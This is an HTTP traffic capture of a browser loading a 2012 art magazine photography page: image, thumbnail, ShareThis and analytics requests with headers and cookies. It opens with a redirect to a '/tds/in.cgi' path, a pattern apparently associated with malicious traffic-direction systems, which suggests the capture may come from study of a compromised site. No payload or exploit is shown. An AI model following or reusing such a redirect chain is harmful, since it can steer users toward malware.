HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: /tds/in.cgi?7?06ac4f00
GET /wp-content/uploads//2010/04/7-pages-web-2.jpg HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:12 GMT
Server: Apache
Last-Modified: Tue, 27 Apr 2010 17:58:06 GMT
Etag: &quot;3e62b-4853ba2b24780&quot;
Accept-Ranges: bytes
Content-Length: 255531
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /wp-content/uploads/2009/07/facebook_32.png HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Last-Modified: Sat, 25 Jul 2009 05:29:31 GMT
Etag: &quot;361-46f81015a44c0&quot;
Accept-Ranges: bytes
Content-Length: 865
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=http://artworksmagazine.com/wp-content/uploads//2011/05/E2009.0554_Eggleston-Red-labeled.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=http://artworksmagazine.com/wp-content/uploads//2011/05/E2009.0554_Eggleston-Red-labeled.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Sat, 21 May 2011 16:13:39 GMT
Content-Length: 6700
Etag: 32fcc8cfe1fa4c77b5c58dafd36d1a98
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=http://artworksmagazine.com/wp-content/uploads//2010/12/TBURNSBTB-W-standing-web1.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=http://artworksmagazine.com/wp-content/uploads//2010/12/TBURNSBTB-W-standing-web1.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Sun, 12 Dec 2010 00:09:07 GMT
Content-Length: 5737
Etag: e6e9099e59636a015536fbb07f979201
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/images/ads/subscribe-small.gif HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Last-Modified: Thu, 10 Jun 2010 19:49:20 GMT
Etag: &quot;38d8-488b25183f000&quot;
Accept-Ranges: bytes
Content-Length: 14552
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /wp-content/uploads//2010/04/7-pages-web-51.jpg HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Server: Apache
Last-Modified: Tue, 27 Apr 2010 18:00:46 GMT
Etag: &quot;3772a-4853bac3baf80&quot;
Accept-Ranges: bytes
Content-Length: 227114
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /share4x/index.63ea568555d3d23c14e63b0226e3adda.html HTTP/1.1

Host: edge.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/1.0.15
Content-Encoding: gzip
Content-Length: 2440
Vary: Accept-Encoding
Cache-Control: max-age=800176
Expires: Fri, 16 Nov 2012 22:37:30 GMT
Date: Wed, 07 Nov 2012 16:21:14 GMT
Connection: keep-alive
GET /wp-content/uploads/2009/07/twitter_32.png HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Last-Modified: Sat, 25 Jul 2009 05:31:21 GMT
Etag: &quot;441-46f8107e8bc40&quot;
Accept-Ranges: bytes
Content-Length: 1089
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /images/spinner.gif HTTP/1.1

Host: edge.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.63ea568555d3d23c14e63b0226e3adda.html
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx/0.8.53
Content-Length: 792
Accept-Ranges: bytes
Cache-Control: max-age=74607
Expires: Thu, 08 Nov 2012 13:04:41 GMT
Date: Wed, 07 Nov 2012 16:21:14 GMT
Connection: keep-alive
GET /share4x/js/st.ceabd4748ab50136cc983839225f512a.js HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.63ea568555d3d23c14e63b0226e3adda.html
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx/1.0.15
Expires: Thu, 07 Nov 2013 16:17:54 GMT
Cache-Control: max-age=31536000
Content-Encoding: gzip
Content-Length: 20943
Date: Wed, 07 Nov 2012 16:21:14 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /wp-content/uploads/2009/07/delicious_32.png HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Last-Modified: Sat, 25 Jul 2009 05:33:17 GMT
Etag: &quot;358-46f810ed2c140&quot;
Accept-Ranges: bytes
Content-Length: 856
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /wp-content/uploads/2009/07/digg_32.png HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Last-Modified: Sat, 25 Jul 2009 05:32:45 GMT
Etag: &quot;37b-46f810cea7940&quot;
Accept-Ranges: bytes
Content-Length: 891
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/04/518287001_wyucc-m-200x300.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/04/518287001_wyucc-m-200x300.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Fri, 24 Apr 2009 19:56:32 GMT
Content-Length: 6289
Etag: f7fbc4bafcc80cbf690acbef25f2ce1c
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads//2010/06/COVER-SUMMER.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads//2010/06/COVER-SUMMER.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Mon, 21 Jun 2010 21:11:41 GMT
Content-Length: 8705
Etag: 9fa04f87c9138de23e92582b4ce549ec
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /getSegment.php?purl=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&jsref=&rnd=1352305274077 HTTP/1.1

Host: seg.sharethis.com
GET /getSegment.php?purl=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;jsref=&amp;rnd=1352305274077 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx/0.8.54
Date: Wed, 07 Nov 2012 16:21:14 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: &quot;policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM&quot;
Content-Encoding: gzip
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2008/12/gtd-08221r-v2.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2008/12/gtd-08221r-v2.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Tue, 10 Mar 2009 02:12:05 GMT
Content-Length: 7904
Etag: b5d62aa6024ab6a65a12c78c4c2d4efc
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/11/Lefner-Portrait.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/11/Lefner-Portrait.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Mon, 02 Nov 2009 18:56:24 GMT
Content-Length: 5915
Etag: 9ba196c7a6e89eafd0954de80fc1b224
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /share4x/css/share.470030190b6a6bdc89365fcc74d3bf55.css HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.63ea568555d3d23c14e63b0226e3adda.html
Cookie: __uset=yes
HTTP/1.1 200 OK

Content-Type: text/css
Server: nginx/0.8.53
Expires: Thu, 07 Nov 2013 15:28:12 GMT
Cache-Control: max-age=31536000
Content-Encoding: gzip
Content-Length: 4505
Date: Wed, 07 Nov 2012 16:21:14 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2008/05/clint-w-camera-300x201.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2008/05/clint-w-camera-300x201.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Tue, 10 Mar 2009 00:53:50 GMT
Content-Length: 6985
Etag: 219e052492f4008818b8adb6366c7ed6
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2008/07/cougar-face-300x203.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2008/07/cougar-face-300x203.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Tue, 10 Mar 2009 02:17:14 GMT
Content-Length: 7620
Etag: df27d2e23bf500eb010b2bc1a59b56d1
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /b?c1=7&c2=8097938&rn=1730076676&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fartworksmagazine.com%252F2010%252F04%252Fphotography-of-alexis-west%252F%26jsref%3D%26rnd%3D1352305274077&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&cv=2.2&cs=js HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=7&amp;c2=8097938&amp;rn=1730076676&amp;c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fartworksmagazine.com%252F2010%252F04%252Fphotography-of-alexis-west%252F%26jsref%3D%26rnd%3D1352305274077&amp;c3=8097938&amp;c8=ShareThis%20Segmenter&amp;c9=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;cv=2.2&amp;cs=js HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;jsref=&amp;rnd=1352305274077
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://b.scorecardresearch.com/b2?c1=7&amp;c2=8097938&amp;rn=1730076676&amp;c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fartworksmagazine.com%252F2010%252F04%252Fphotography-of-alexis-west%252F%26jsref%3D%26rnd%3D1352305274077&amp;c3=8097938&amp;c8=ShareThis%20Segmenter&amp;c9=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;cv=2.2&amp;cs=js
Date: Wed, 07 Nov 2012 16:21:14 GMT
Connection: keep-alive
Set-Cookie: UID=2d6a37e-195.159.219.8-1352305274; expires=Tue, 28-Oct-2014 16:21:14 GMT; path=/; domain=.scorecardresearch.com UIDR=1352305274; expires=Tue, 28-Oct-2014 16:21:14 GMT; path=/; domain=.scorecardresearch.com
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/03/moma-300x195.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=/wp-content/uploads/2009/03/moma-300x195.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:14 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Fri, 13 Mar 2009 19:48:56 GMT
Content-Length: 8457
Etag: 9ed27554c893b5bad850a422c3538c15
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
